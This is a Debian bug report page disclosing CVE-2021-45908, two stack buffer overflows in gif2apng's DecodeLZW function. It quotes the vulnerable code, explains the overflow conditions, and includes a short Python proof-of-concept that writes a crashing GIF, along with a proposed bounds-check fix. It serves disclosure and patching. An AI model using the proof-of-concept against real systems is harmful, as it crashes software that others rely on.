Headline
CVE-2021-45908: #1002669 - gif2apng: Two stack based buffer overflows in the DecodeLZW function
An issue was discovered in gif2apng 1.9. There is a stack-based buffer overflow involving a while loop. An attacker has little influence over the data written to the stack, making it unlikely that the flow of control can be subverted.
Reply or subscribe to this bug.
Toggle useless messages
Report forwarded to [email protected], Debian QA Group <[email protected]>:
Bug#1002669; Package gif2apng. (Sun, 26 Dec 2021 23:15:04 GMT) (full text, mbox, link).
Acknowledgement sent to Kolja Grassmann <[email protected]>:
New Bug report received and forwarded. Copy sent to Debian QA Group <[email protected]>. (Sun, 26 Dec 2021 23:15:04 GMT) (full text, mbox, link).
Message #5 received at [email protected] (full text, mbox, reply):
Package: gif2apng Version: 1.9+srconly-3 Severity: normal Tags: security
Dear Maintainer,
There are two stack based buffer overflows in the gif2apng application. The responsible code is located in the DecodeLZW function and looks as follows:
void DecodeLZW(unsigned char * img, unsigned int img_size, FILE * f1) // added parameter img_size { int i, bits, codesize, codemask, clearcode, nextcode, lastcode; unsigned int j; unsigned int size = 0; unsigned int accum = 0; unsigned short prefix[4097]; unsigned char suffix[4097]; unsigned char str[4097]; unsigned char data[1024]; unsigned char firstchar = 0; unsigned char *pstr = str; unsigned char *pout = img; unsigned char mincodesize;
if (fread(&mincodesize, 1, 1, f1) != 1) return;
bits = 0; codesize = mincodesize + 1; codemask = (1 << codesize) - 1; clearcode = 1 << mincodesize; nextcode = clearcode + 2; lastcode = -1;
for (i=0; i<clearcode; i++) suffix[i] = i; […] while (code >= clearcode) { *pstr++ = suffix[code]; code = prefix[code]; }
In both loops at the end it is possible to write over the boundaries of the buffer by providing certain values a part of the gif file. For the for loop we can provide a large value for mincodesize leading to a clearcode bigger than 4097 and therefore overflowing the buffer. In the while loop we can provide code values, that repeat so that prefix[code] results in the same code again.
I wrote the following script to generate a poc.gif file:
#!/bin/python3
Writing to poc.gif
f = open("poc.gif", “wb”)
Data needed to enter the code path:
beginning = b"GIF87a" + b"\x10\x00\x10\x00" + b"\x01" * 3 + b"\x2c" + b"\x01" * 9 f.write(beginning)
mincode = b"\x07"
Uncomment the following line to trigger the other crash
mincode = b"\x10"
f.write(mincode)
Size value and byte we write to the heap
target_char = b"\x01" + b"\xff\xfe"*10000 f.write(target_char)
f.close()
The poc.gif file generated by the script does trigger the overflow in the while loop. If the other value for mincode is used it should trigger the overflow in the for loop. Using the poc.gif file as follows led to a segmentation fault: $ gif2apng -i0 poc.gif /dev/null
gif2apng 1.9 using ZLIB
Reading 'poc.gif’… Speicherzugriffsfehler
As I see no way to control the data, that is written in the loops I do not think, that this can necessarily exploited to gain code execution.
I fixed the issue locally by introducing a variable, that keeps track of the amount of data written to the pstr pointer and by doing some boundary checks before writing to the buffers:
if (clearcode > 4097) { // Added to avoid stack overflow here printf(“Invalid Image\n”); exit(0); } for (i=0; i<clearcode; i++) suffix[i] = i; […] if (code >= nextcode) { if ( write_counter <= 4097) { // Added to fix stack overflow here *pstr++ = firstchar; write_counter++; code = lastcode; } else { printf(“Invalid Image\n”); exit(0); } }
while (code >= clearcode)
{
if ( write\_counter <= 4097) { // Added to fix stack overflow here
\*pstr++ = suffix\[code\];
write\_counter++;
code = prefix\[code\];
}
else {
printf("Invalid Image\\n");
exit(0);
}
}
if ( write\_counter <= 4097) { // Added to fix stack overflow here
\*pstr++ = firstchar = suffix\[code\];
write\_counter++;
}
else {
printf("Invalid Image\\n");
exit(0);
}
This seemed to fix the issue for me locally, but it could use some more testing.
Best regards Kolja
– System Information: Debian Release: 10.11 APT prefers oldstable-updates APT policy: (500, ‘oldstable-updates’), (500, ‘oldstable’) Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores) Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled
Versions of packages gif2apng depends on: ii libc6 2.28-10 ii libzopfli1 1.0.2-1 ii zlib1g 1:1.2.11.dfsg-1
gif2apng recommends no packages.
Versions of packages gif2apng suggests: pn apng2gif <none>
– no debconf information
Added tag(s) upstream. Request was from Salvatore Bonaccorso <[email protected]> to [email protected]. (Sun, 26 Dec 2021 23:21:10 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <[email protected]>. Last modified: Tue Dec 28 01:30:18 2021; Machine Name: buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.